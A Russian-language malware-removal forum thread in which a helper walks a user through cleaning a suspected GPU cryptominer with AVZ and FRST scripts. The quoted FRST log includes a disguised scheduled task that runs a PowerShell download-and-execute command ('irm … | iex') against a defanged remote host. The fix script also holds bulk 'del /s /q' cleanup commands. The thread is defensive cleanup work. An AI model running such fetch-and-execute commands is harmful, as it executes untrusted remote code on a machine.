Показано с 1 по 5 из 5.

Подозрение на майнер. (заявка № 229770)

  1. #1
    Junior Member Репутация
    Регистрация
    15.08.2013
    Сообщений
    36
    Вес репутации
    44

    Подозрение на майнер.

    Здравствуйте. Недавно обнаружил что видео карта постоянно нагружена на 100 процентов. Как только отключаю интернет, нагрузка падает. Заранее спасибо за помощь.
    Вложения Вложения

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    383
    Уважаемый(ая) Filviktor, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,469
    Вес репутации
    1084
    Выполните скрипт в AVZ из папки Autologger\AV\av_z.exe:
    Код:
    begin
     ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
     TerminateProcessByName('c:\programdata\winaihservice\winaihservice.exe');
     TerminateProcessByName('c:\programdata\winaihservice\winservicenetworking.exe');
     DeleteFile('c:\programdata\winaihservice\winaihservice.exe', '');
     DeleteFile('C:\ProgramData\WinAIHService\WinAIHService.exe', '64');
     DeleteFile('c:\programdata\winaihservice\winservicenetworking.exe', '');
     DeleteFile('c:\programdata\winaihservice\winservicenetworking.exe', '64');
     DeleteFileMask('c:\programdata\winaihservice', '*', true);
     DeleteDirectory('c:\programdata\winaihservice');
     RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'Win AIH Service', '64');
    ExecuteSysClean;
    RebootWindows(true);
    end.
    Компьютер перезагрузится.

    Скачайте Farbar Recovery Scan Tool или с зеркала и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    Запустите программу. Когда программа запустится, нажмите Да для соглашения с предупреждением.

    Нажмите кнопку Сканировать.

    После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
    Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
    WBR,
    Vadim

  5. #4
    Junior Member Репутация
    Регистрация
    15.08.2013
    Сообщений
    36
    Вес репутации
    44
    Спасибо за помощь.
    Вложения Вложения

  6. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    06.05.2008
    Адрес
    Тула
    Сообщений
    36,469
    Вес репутации
    1084
    Выделите и скопируйте в буфер обмена следующий код:
    Код:
    Start::
    CloseProcesses:
    HKLM\...\Run: [Win AIH Service] => C:\ProgramData\WinAIHService\WinAIHService.exe [311296 2025-06-28] () [File not signed]
    Task: {7037890B-B1BD-41B1-968C-3E4403A752BC} - System32\Tasks\Microsoft\Office\Office Persistent Activation => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-13] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ATTENTION
    HKU\S-1-5-21-108240752-3943798192-2182586631-1001\...\MountPoints2: {45592ac8-61b4-11ef-a6dc-4c034fe5b0c2} - "D:\setup.exe" 
    2025-06-29 08:23 - 2025-05-08 20:28 - 000000000 ____D C:\ProgramData\WinAIHService
    FirewallRules: [UDP Query User{EA3471DC-ABDC-4AA8-AF2E-632689CF1195}C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Block) C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
    FirewallRules: [TCP Query User{7066FE61-F93B-404D-AB78-ABC04115B1EC}C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Block) C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
    FirewallRules: [{6FB4212F-CECC-40CA-90BB-DABBAD367BD3}] => (Block) %APPDATA%\Movavi Video Editor Plus 2022\VideoEditorPlus.exe => No File
    FirewallRules: [UDP Query User{CFB8B896-66D6-4344-88BF-DD5D1D25AB0D}C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
    FirewallRules: [TCP Query User{FC7FAECA-53C9-4B90-A2DE-EF9E1DFE5BD7}C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe] => (Allow) C:\cyberpunk 2077\bin\x64\cyberpunk2077.exe => No File
    FirewallRules: [{4E725FAB-AFD8-4136-8478-641432B7F806}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe => No File
    FirewallRules: [{06EBE987-7CFD-49DF-B55C-F65210CDB009}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe => No File
    FirewallRules: [{47cda63b-dfa1-459b-ab8a-e01d8b4a5d99}] => (Allow) C:\ProgramData\WinAIHService\WinAIHService.exe () [File not signed]
    FirewallRules: [{6de73cd3-816b-4f53-834f-a0a8c4708b55}] => (Allow) C:\ProgramData\WinAIHService\WinAIHService.exe () [File not signed]
    FirewallRules: [{230bd764-dd9d-4c06-8025-5bed1ce6ec89}] => (Allow) C:\ProgramData\WinAIHService\WinAIHService.exe () [File not signed]
    FirewallRules: [{b7738539-3724-444f-b56e-c17ac2b92066}] => (Allow) C:\ProgramData\WinAIHService\WinAIHService.exe () [File not signed]
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    StartBatch:
    del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Cache\*.*" >nul
    del /s /q "%userprofile%\AppData\Local\Google\Chrome\User Data\Default\Code Cache\Js\*.*" >nul
    del /s /q "%userprofile%\AppData\Local\Opera Software\Opera Stable\Default\Cache\Cache_Data\*.*" >nul
    del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\*.*" >nul
    del /s /q "%userprofile%\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\Js\*.*" >nul
    del /s /q C:\Windows\Temp\*.* >nul
    del /s /q "%userprofile%\AppData\Local\temp\*.*" >nul
    del /s /q C:\Windows\Minidump\*.dmp >nul
    ipconfig /flushdns
    sfc /scannow
    endbatch:
    CreateRestorePoint:
    Reboot:
    End::
    Запустите FRST.EXE/FRST64.EXE, нажмите один раз Исправить и подождите. Вставлять код никуда не нужно, программа возьмёт его из буфера обмена. Будет создан лог-файл (Fixlog.txt), прикрепите его к своему следующему сообщению.
    Компьютер будет перезагружен.

    Сообщите, что с проблемой.
    WBR,
    Vadim

Похожие темы

  1. Ответов: 17
    Последнее сообщение: 05.07.2014, 20:07
  2. Ответов: 19
    Последнее сообщение: 22.03.2014, 16:24
  3. Подозрение на биткоин майнер
    От f1x3r в разделе Помогите!
    Ответов: 5
    Последнее сообщение: 05.03.2014, 21:22
  4. Подозрение на Miner\Майнер,загрузка ГП 99%
    От Playerok97 в разделе Помогите!
    Ответов: 4
    Последнее сообщение: 23.02.2014, 13:23
  5. Ответов: 10
    Последнее сообщение: 25.01.2014, 22:23

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01141 seconds with 19 queries